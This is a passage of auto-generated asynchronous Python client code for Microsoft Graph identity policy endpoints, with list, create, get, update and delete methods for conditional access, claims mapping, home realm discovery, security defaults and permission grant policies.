if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
update_claims_mapping_policies.metadata = {'url': '/policies/claimsMappingPolicies/{claimsMappingPolicy-id}'} # type: ignore
async def delete_claims_mapping_policies(
self,
claims_mapping_policy_id: str,
if_match: Optional[str] = None,
**kwargs
) -> None:
"""Delete navigation property claimsMappingPolicies for policies.
Delete navigation property claimsMappingPolicies for policies.
:param claims_mapping_policy_id: key: id of claimsMappingPolicy.
:type claims_mapping_policy_id: str
:param if_match: ETag.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delete_claims_mapping_policies.metadata['url'] # type: ignore
path_format_arguments = {
'claimsMappingPolicy-id': self._serialize.url("claims_mapping_policy_id", claims_mapping_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
delete_claims_mapping_policies.metadata = {'url': '/policies/claimsMappingPolicies/{claimsMappingPolicy-id}'} # type: ignore
def list_conditional_access_policies(
self,
orderby: Optional[List[Union[str, "models.Enum124"]]] = None,
select: Optional[List[Union[str, "models.Enum125"]]] = None,
expand: Optional[List[str]] = None,
**kwargs
) -> AsyncIterable["models.collectionofconditionalaccesspolicy0"]:
"""Get conditionalAccessPolicies from policies.
Get conditionalAccessPolicies from policies.
:param orderby: Order items by property values.
:type orderby: list[str or ~identity_sign_ins.models.Enum124]
:param select: Select properties to be returned.
:type select: list[str or ~identity_sign_ins.models.Enum125]
:param expand: Expand related entities.
:type expand: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either collectionofconditionalaccesspolicy0 or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_sign_ins.models.collectionofconditionalaccesspolicy0]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.collectionofconditionalaccesspolicy0"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_conditional_access_policies.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('collectionofconditionalaccesspolicy0', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.odataerror, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_conditional_access_policies.metadata = {'url': '/policies/conditionalAccessPolicies'} # type: ignore
async def create_conditional_access_policies(
self,
body: "models.microsoftgraphconditionalaccesspolicy",
**kwargs
) -> "models.microsoftgraphconditionalaccesspolicy":
"""Create new navigation property to conditionalAccessPolicies for policies.
Create new navigation property to conditionalAccessPolicies for policies.
:param body: New navigation property.
:type body: ~identity_sign_ins.models.microsoftgraphconditionalaccesspolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphconditionalaccesspolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphconditionalaccesspolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphconditionalaccesspolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_conditional_access_policies.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'microsoftgraphconditionalaccesspolicy')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphconditionalaccesspolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_conditional_access_policies.metadata = {'url': '/policies/conditionalAccessPolicies'} # type: ignore
async def get_conditional_access_policies(
self,
conditional_access_policy_id: str,
select: Optional[List[Union[str, "models.Enum126"]]] = None,
expand: Optional[List[str]] = None,
**kwargs
) -> "models.microsoftgraphconditionalaccesspolicy":
"""Get conditionalAccessPolicies from policies.
Get conditionalAccessPolicies from policies.
:param conditional_access_policy_id: key: id of conditionalAccessPolicy.
:type conditional_access_policy_id: str
:param select: Select properties to be returned.
:type select: list[str or ~identity_sign_ins.models.Enum126]
:param expand: Expand related entities.
:type expand: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphconditionalaccesspolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphconditionalaccesspolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphconditionalaccesspolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_conditional_access_policies.metadata['url'] # type: ignore
path_format_arguments = {
'conditionalAccessPolicy-id': self._serialize.url("conditional_access_policy_id", conditional_access_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphconditionalaccesspolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_conditional_access_policies.metadata = {'url': '/policies/conditionalAccessPolicies/{conditionalAccessPolicy-id}'} # type: ignore
async def update_conditional_access_policies(
self,
conditional_access_policy_id: str,
body: "models.microsoftgraphconditionalaccesspolicy",
**kwargs
) -> None:
"""Update the navigation property conditionalAccessPolicies in policies.
Update the navigation property conditionalAccessPolicies in policies.
:param conditional_access_policy_id: key: id of conditionalAccessPolicy.
:type conditional_access_policy_id: str
:param body: New navigation property values.
:type body: ~identity_sign_ins.models.microsoftgraphconditionalaccesspolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_conditional_access_policies.metadata['url'] # type: ignore
path_format_arguments = {
'conditionalAccessPolicy-id': self._serialize.url("conditional_access_policy_id", conditional_access_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'microsoftgraphconditionalaccesspolicy')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
update_conditional_access_policies.metadata = {'url': '/policies/conditionalAccessPolicies/{conditionalAccessPolicy-id}'} # type: ignore
async def delete_conditional_access_policies(
self,
conditional_access_policy_id: str,
if_match: Optional[str] = None,
**kwargs
) -> None:
"""Delete navigation property conditionalAccessPolicies for policies.
Delete navigation property conditionalAccessPolicies for policies.
:param conditional_access_policy_id: key: id of conditionalAccessPolicy.
:type conditional_access_policy_id: str
:param if_match: ETag.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delete_conditional_access_policies.metadata['url'] # type: ignore
path_format_arguments = {
'conditionalAccessPolicy-id': self._serialize.url("conditional_access_policy_id", conditional_access_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
delete_conditional_access_policies.metadata = {'url': '/policies/conditionalAccessPolicies/{conditionalAccessPolicy-id}'} # type: ignore
def list_home_realm_discovery_policies(
self,
orderby: Optional[List[Union[str, "models.Enum127"]]] = None,
select: Optional[List[Union[str, "models.Enum128"]]] = None,
expand: Optional[List[Union[str, "models.Enum129"]]] = None,
**kwargs
) -> AsyncIterable["models.collectionofhomerealmdiscoverypolicy"]:
"""Get homeRealmDiscoveryPolicies from policies.
Get homeRealmDiscoveryPolicies from policies.
:param orderby: Order items by property values.
:type orderby: list[str or ~identity_sign_ins.models.Enum127]
:param select: Select properties to be returned.
:type select: list[str or ~identity_sign_ins.models.Enum128]
:param expand: Expand related entities.
:type expand: list[str or ~identity_sign_ins.models.Enum129]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either collectionofhomerealmdiscoverypolicy or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_sign_ins.models.collectionofhomerealmdiscoverypolicy]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.collectionofhomerealmdiscoverypolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_home_realm_discovery_policies.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('collectionofhomerealmdiscoverypolicy', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.odataerror, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_home_realm_discovery_policies.metadata = {'url': '/policies/homeRealmDiscoveryPolicies'} # type: ignore
async def create_home_realm_discovery_policies(
self,
body: "models.microsoftgraphhomerealmdiscoverypolicy",
**kwargs
) -> "models.microsoftgraphhomerealmdiscoverypolicy":
"""Create new navigation property to homeRealmDiscoveryPolicies for policies.
Create new navigation property to homeRealmDiscoveryPolicies for policies.
:param body: New navigation property.
:type body: ~identity_sign_ins.models.microsoftgraphhomerealmdiscoverypolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphhomerealmdiscoverypolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphhomerealmdiscoverypolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphhomerealmdiscoverypolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_home_realm_discovery_policies.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'microsoftgraphhomerealmdiscoverypolicy')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphhomerealmdiscoverypolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_home_realm_discovery_policies.metadata = {'url': '/policies/homeRealmDiscoveryPolicies'} # type: ignore
async def get_home_realm_discovery_policies(
self,
home_realm_discovery_policy_id: str,
select: Optional[List[Union[str, "models.Enum130"]]] = None,
expand: Optional[List[Union[str, "models.Enum131"]]] = None,
**kwargs
) -> "models.microsoftgraphhomerealmdiscoverypolicy":
"""Get homeRealmDiscoveryPolicies from policies.
Get homeRealmDiscoveryPolicies from policies.
:param home_realm_discovery_policy_id: key: id of homeRealmDiscoveryPolicy.
:type home_realm_discovery_policy_id: str
:param select: Select properties to be returned.
:type select: list[str or ~identity_sign_ins.models.Enum130]
:param expand: Expand related entities.
:type expand: list[str or ~identity_sign_ins.models.Enum131]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphhomerealmdiscoverypolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphhomerealmdiscoverypolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphhomerealmdiscoverypolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_home_realm_discovery_policies.metadata['url'] # type: ignore
path_format_arguments = {
'homeRealmDiscoveryPolicy-id': self._serialize.url("home_realm_discovery_policy_id", home_realm_discovery_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphhomerealmdiscoverypolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_home_realm_discovery_policies.metadata = {'url': '/policies/homeRealmDiscoveryPolicies/{homeRealmDiscoveryPolicy-id}'} # type: ignore
async def update_home_realm_discovery_policies(
self,
home_realm_discovery_policy_id: str,
body: "models.microsoftgraphhomerealmdiscoverypolicy",
**kwargs
) -> None:
"""Update the navigation property homeRealmDiscoveryPolicies in policies.
Update the navigation property homeRealmDiscoveryPolicies in policies.
:param home_realm_discovery_policy_id: key: id of homeRealmDiscoveryPolicy.
:type home_realm_discovery_policy_id: str
:param body: New navigation property values.
:type body: ~identity_sign_ins.models.microsoftgraphhomerealmdiscoverypolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_home_realm_discovery_policies.metadata['url'] # type: ignore
path_format_arguments = {
'homeRealmDiscoveryPolicy-id': self._serialize.url("home_realm_discovery_policy_id", home_realm_discovery_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'microsoftgraphhomerealmdiscoverypolicy')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
update_home_realm_discovery_policies.metadata = {'url': '/policies/homeRealmDiscoveryPolicies/{homeRealmDiscoveryPolicy-id}'} # type: ignore
async def delete_home_realm_discovery_policies(
self,
home_realm_discovery_policy_id: str,
if_match: Optional[str] = None,
**kwargs
) -> None:
"""Delete navigation property homeRealmDiscoveryPolicies for policies.
Delete navigation property homeRealmDiscoveryPolicies for policies.
:param home_realm_discovery_policy_id: key: id of homeRealmDiscoveryPolicy.
:type home_realm_discovery_policy_id: str
:param if_match: ETag.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delete_home_realm_discovery_policies.metadata['url'] # type: ignore
path_format_arguments = {
'homeRealmDiscoveryPolicy-id': self._serialize.url("home_realm_discovery_policy_id", home_realm_discovery_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
delete_home_realm_discovery_policies.metadata = {'url': '/policies/homeRealmDiscoveryPolicies/{homeRealmDiscoveryPolicy-id}'} # type: ignore
async def get_identity_security_defaults_enforcement_policy(
self,
select: Optional[List[Union[str, "models.Enum132"]]] = None,
expand: Optional[List[str]] = None,
**kwargs
) -> "models.microsoftgraphidentitysecuritydefaultsenforcementpolicy":
"""Get identitySecurityDefaultsEnforcementPolicy from policies.
Get identitySecurityDefaultsEnforcementPolicy from policies.
:param select: Select properties to be returned.
:type select: list[str or ~identity_sign_ins.models.Enum132]
:param expand: Expand related entities.
:type expand: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphidentitysecuritydefaultsenforcementpolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphidentitysecuritydefaultsenforcementpolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphidentitysecuritydefaultsenforcementpolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_identity_security_defaults_enforcement_policy.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphidentitysecuritydefaultsenforcementpolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_identity_security_defaults_enforcement_policy.metadata = {'url': '/policies/identitySecurityDefaultsEnforcementPolicy'} # type: ignore
async def update_identity_security_defaults_enforcement_policy(
self,
body: "models.microsoftgraphidentitysecuritydefaultsenforcementpolicy",
**kwargs
) -> None:
"""Update the navigation property identitySecurityDefaultsEnforcementPolicy in policies.
Update the navigation property identitySecurityDefaultsEnforcementPolicy in policies.
:param body: New navigation property values.
:type body: ~identity_sign_ins.models.microsoftgraphidentitysecuritydefaultsenforcementpolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_identity_security_defaults_enforcement_policy.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'microsoftgraphidentitysecuritydefaultsenforcementpolicy')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
update_identity_security_defaults_enforcement_policy.metadata = {'url': '/policies/identitySecurityDefaultsEnforcementPolicy'} # type: ignore
async def delete_identity_security_defaults_enforcement_policy(
self,
if_match: Optional[str] = None,
**kwargs
) -> None:
"""Delete navigation property identitySecurityDefaultsEnforcementPolicy for policies.
Delete navigation property identitySecurityDefaultsEnforcementPolicy for policies.
:param if_match: ETag.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delete_identity_security_defaults_enforcement_policy.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
delete_identity_security_defaults_enforcement_policy.metadata = {'url': '/policies/identitySecurityDefaultsEnforcementPolicy'} # type: ignore
def list_permission_grant_policies(
self,
orderby: Optional[List[Union[str, "models.Enum133"]]] = None,
select: Optional[List[Union[str, "models.Enum134"]]] = None,
expand: Optional[List[Union[str, "models.Enum135"]]] = None,
**kwargs
) -> AsyncIterable["models.collectionofpermissiongrantpolicy"]:
"""Get permissionGrantPolicies from policies.
Get permissionGrantPolicies from policies.
:param orderby: Order items by property values.
:type orderby: list[str or ~identity_sign_ins.models.Enum133]
:param select: Select properties to be returned.
:type select: list[str or ~identity_sign_ins.models.Enum134]
:param expand: Expand related entities.
:type expand: list[str or ~identity_sign_ins.models.Enum135]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either collectionofpermissiongrantpolicy or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_sign_ins.models.collectionofpermissiongrantpolicy]
:raises: ~azure.core.exceptions.HttpResponseError
"""
